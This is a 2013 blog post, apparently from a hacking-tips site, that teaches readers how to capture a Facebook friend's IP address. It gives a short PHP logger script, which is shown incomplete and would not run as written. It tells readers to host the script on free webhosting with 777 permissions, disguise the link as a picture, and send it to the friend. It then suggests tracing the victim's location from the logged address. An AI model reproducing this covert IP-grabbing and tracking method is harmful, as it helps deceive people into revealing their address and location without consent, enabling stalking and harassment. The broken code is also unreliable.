d0837296baef4fc14d667832c1a5215944b54a8f46af2d5c5c How To Get ip Address Of Facebook Friend | TipsS And TricksS

How To Get ip Address Of Facebook Friend

on Monday 25 November 2013
How To Get ip Address Of Facebook Friend

Aslam-o-Alaikum Today i m Teaching You How to Get Friend's IP Address from Facebook friend

Step 1 (Creating PHP File)

1) Create a new text document and edit it.

2) Write the following PHP code inside it:



$dt = date("l dS \of F Y h:i:s A"); 


$data = $ip.' '.$dt."\n"; 

fwrite($file, $data); 


header( 'Location: https://www.Hackingoshit.blogspot.com') ; 


3) Replace ''www.Hackingoshit.blogspot.com" with any other link (picture link...)

4) Save that as  : anything.php (e.g: ip.php)

Step 2 ( Webhosting )

You can Signup for an account in any Free webhosting service

1) Go to x10hosting

2) Signup for an account ( choose a right domain name e.g : Anonsoul.x10.mx )

3) After creating an account on x10hosting, go to the File Manager and open the public_html directory

4) Click Upload, and select the PHP file that you created on Step1.4 (ip.php)

5) Select all permissions from Read/Write/Execute (777)

Step 3 (Get IP Address )

After setting up an account and uploading the .PHP File, it's time to get IP Address of any Friend on Facebook

1) Go to the domain that you created in Step2. in my example Anonsoul.x10.mx

2) You'll see the PHP file that you created, right click>Copy Address Link

3) The link will be something like this : yourdomain.x10.mx/anything.php

In our example it will be: Anonsoul.x10.mx/ip.php

4) Send that link to any of your friends, after he/she clicks on the link, he/she will be redirected to the link that you replaced in step1.3 (in my example : ztuts.com )

5) Go to your domain name again like step1 (e.g: razor.x10.mx)

6) You'll see a new text document named ip_log.txt

7) Click that file, you'll get all IP Addresses of your friends that accessed that link.

Done!  Now you can track their IP Location using IP Tracer,


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